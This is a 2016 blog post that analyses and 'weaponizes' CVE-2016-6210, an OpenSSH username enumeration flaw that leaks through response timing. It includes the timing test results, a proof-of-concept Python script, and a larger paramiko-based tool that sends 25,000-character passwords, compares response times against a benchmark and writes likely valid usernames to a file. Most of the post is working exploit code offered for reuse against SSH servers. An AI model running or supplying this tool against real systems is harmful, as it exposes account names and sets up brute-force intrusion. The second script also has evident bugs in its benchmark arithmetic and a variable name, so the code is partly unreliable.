Analyzing and Weaponizing the Latest OpenSSH Enumeration Vulnerability [CVE-2016-6210]

Released yesterday CVE-2016-6210 has garnered quite a bit of attention in the community.

TLDR: It works.

Here if you just came for the code.


From people expressing their distaste in the overall "hype", to a large number of people claiming that either they cannot get it to work, or that the vulnerability is simply invalid, and even more people asking whether or not this is a rehashing/re-release of a few older OpenSSH timing vulnerabilities || CVE-2006-5229.

The majority of the hate has come from those that are saying password(s) shouldn't be

I decided to do some analysis myself to verify exploitability as well as learn a little bit about the unavoidable semantics of yet-another-timing-attack.

Background:

Posted by Eddie Harari on Full Disclosure
http://seclists.org/fulldisclosure/2016/Jul/51

The brief:

By sending large passwords, a remote user can enumerate users on system that runs SSHD. This problem exists in most
modern configuration due to the fact that it takes much longer to calculate SHA256/SHA512 hash than BLOWFISH hash.

The (more) technical:

When SSHD tries to authenticate a non-existing user, it will pick up a fake password structure hardcoded in the SSHD
source code. On this hard coded password structure the password hash is based on BLOWFISH ($2) algorithm.
If real users passwords are hashed using SHA256/SHA512, then sending large passwords (10KB) will result in shorter
response time from the server for non-existing users.

NOTE: Mr. Harari tested this on opensshd-7.2p2, while my testing was done on OpenSSH_6.9p1.

Cannibalizing the code shared by Mr. Harari I wrote up a PoC that would allow me to get the data I require to verify this vulnerability's authenticity.

import paramiko
import time, sys, csv

p='A'*25000
ssh = paramiko.SSHClient()

if(len(sys.argv) < 3):
	print "Usage: "+sys.argv[0]+" uname_list.txt host"
	sys.exit()

username_list = sys.argv[1]
target = sys.argv[2]
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())

var = 1
while var == 1:
	with open(username_list) as users:
		for username in users:
			username = username.replace('\n','')
			starttime=time.clock()
			try:
				ssh.connect(target, username=username,password=p)
			except:
				endtime=time.clock()
			total=endtime-starttime
			print(username+" : "+str(total))
			with open('output.csv', 'a') as outputFile:
				csvFile = csv.writer(outputFile, delimiter=',')
				data = [[username, total]]
				csvFile.writerows(data)

I ran 3 separate tests (a total of 4688 requests) letting it continuously iterate through my list of account names (valid and invalid), and write the results to a csv for analysis.

Included below are the two main tests and their results.

Excel() -> Sort() -> Graph() -> Light() -> Eyes()

The results were obvious -

Test 1:

Valid Users: realuser & test.
Raw Data -
I realized that the usernames I chose were rather confusing

Test 2:

Valid Users: justice, realuser, enumme.
Raw Data

We can plainly see that the existing users take significantly longer than the rest.
Calculations:
  • Non-Existing user average per request: 0.04704169506518s
  • Existing user average per request: 0.21342703801396s

Currently working on developing a effective response-timing threshold for tool based determination of "valid" usernames, as well as emulating all of this functionality in C.

Below is the first version of the "weaponized" exploit for this. It is currently based around a 10-30% range of deviation for timing(s) of valid versus invalid usernames. Currently only >20% are accepted as a valid usernames and appended to the output list accordingly (feel free to tweak this within the script). This has proved effective for me.

#!/usr/bin/python
import paramiko
import time, sys, csv, os
import threading, multiprocessing
import logging

if(len(sys.argv) < 4):
	print "REL: CVE-2016-6210"
	print "Usage: "+sys.argv[0]+" uname_list.txt host outfile"
	sys.exit()

p='A'*25000
THREAD_COUNT = 3	# This is also the amount of "samples" that the application will take into account for each calculation (time/THREAD_COUNT) = avg_resp;
FAKE_USER = "AaAaAaAaAa"	# Benchmark user, I definitely don't exist
BENCHMARK = 0

num_lines = sum(1 for line in open(sys.argv[1]))
username_list = sys.argv[1]
var = 0; time_per_user = 0;
threads = []; usertimelist = {};

def ssh_connection(target, usertarget, outfile):
	global time_per_user
	starttime = 0; endtime = 0; total = 0;
	ssh = paramiko.SSHClient()
	ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
	starttime = time.clock()
	try:
		ssh.connect(target, username=usertarget,password=p)
	except:
		endtime = time.clock() # TIME the connection
	total = endtime - starttime
	# print usertarget+" : "+str(total) # print times of each connection attempt as its going (username:time)
	with open(outfile, 'a+') as outputFile:
		csvFile = csv.writer(outputFile, delimiter=',')
		data = [[username, total]]
		csvFile.writerows(data)
	time_per_user += total

if not os.stat(username_list).st_size == 0:
	print "- Connection logging set to paramiko.log, necessary so Paramiko doesn't fuss, useful for debugging."
	paramiko.util.log_to_file("paramiko.log")
	ssh_bench = paramiko.SSHClient()
	ssh_bench.set_missing_host_key_policy(paramiko.AutoAddPolicy())
	print "- Calculating a benchmark using FAKE_USER for more accurate results..."
	tempbench = []
	for i in range(0,THREAD_COUNT):
		starttime = time.clock()
		try:
			ssh_bench.connect(sys.argv[2], username=FAKE_USER,password=p)
		except:
			endtime = time.clock()
		tempbench.append(endtime)
	BENCHMARK = sum(i for i in tempbench)/5
	print "* Benchmark Successfully Calculated: " + str(BENCHMARK)
	with open(username_list) as users:
		for username in users:
			username = username.replace('\n','')
			for i in range(THREAD_COUNT):
				threader = threading.Thread(target=ssh_connection, args=(sys.argv[2], username, sys.argv[3]))
				threads.append(threader)
			for thread in threads:
				thread.start()
				thread.join()
			threads = []
			print "[+] Averaged time for username "+username+" : "+str((time_per_user/THREAD_COUNT))
			usertimelist.update({username : (time_per_user/THREAD_COUNT)})
			time_per_user = 0
else:
	print "[-] List is empty.. what did you expect? Give me some usernames."
	# [thread.start() for thread in threads]
	# [thread.join() for thread in threads]	
for user in sorted(usertimelist.items(), reverse=True):
	BENCHMARK = user[1]/BENCHMARK
	fname = sys.argv[2].replace('.','_')+"_valid_usernames.txt"
	if((BENCHMARK <= .10)): # 10% or less
		print "[+] " + user[0] + " invalid user; less than 10 percent of benchmark at: "+str(BENCHMARK)
	elif ((BENCHMARK) < .20):
		print "[+] " + user[0] + " toss up, not including based on current settings at: "+str(BENCHMARK)
	elif (((BENCHMARK) >= .20) and (BENCHMARK) < .30): # 20% greater
		print "[+] " + user[0] + " likely a valid user at: "+str(BENCHMARK) + ". Appending to: " + fname
		with open(fname, "a+") as outputFile:
			outputFile.write(user[0]+"\n")
	elif ((BENCHMARK) >= .30): # 30% or greater above the benchmark
		print "[+] " + user[0] + " is a valid user, appending to: " + fname
		with open(fname, "a+") as outputFile:
			outputFile.write(user[0]+"\n")
Coming maybe sometime ever soon:
  • Get true threads working for efficiency (right now it's rather slow); had issues with timing when true threading was used (also tried subprocesses). If someone gets this feel free to let me know, I would gladly update this.
  • Re-release in C. Added to the bitbucket repository; All credits for the C rendition go to my friend and wonderful artist Anthony Garcia.

Justice Cassel

Read more posts by this author.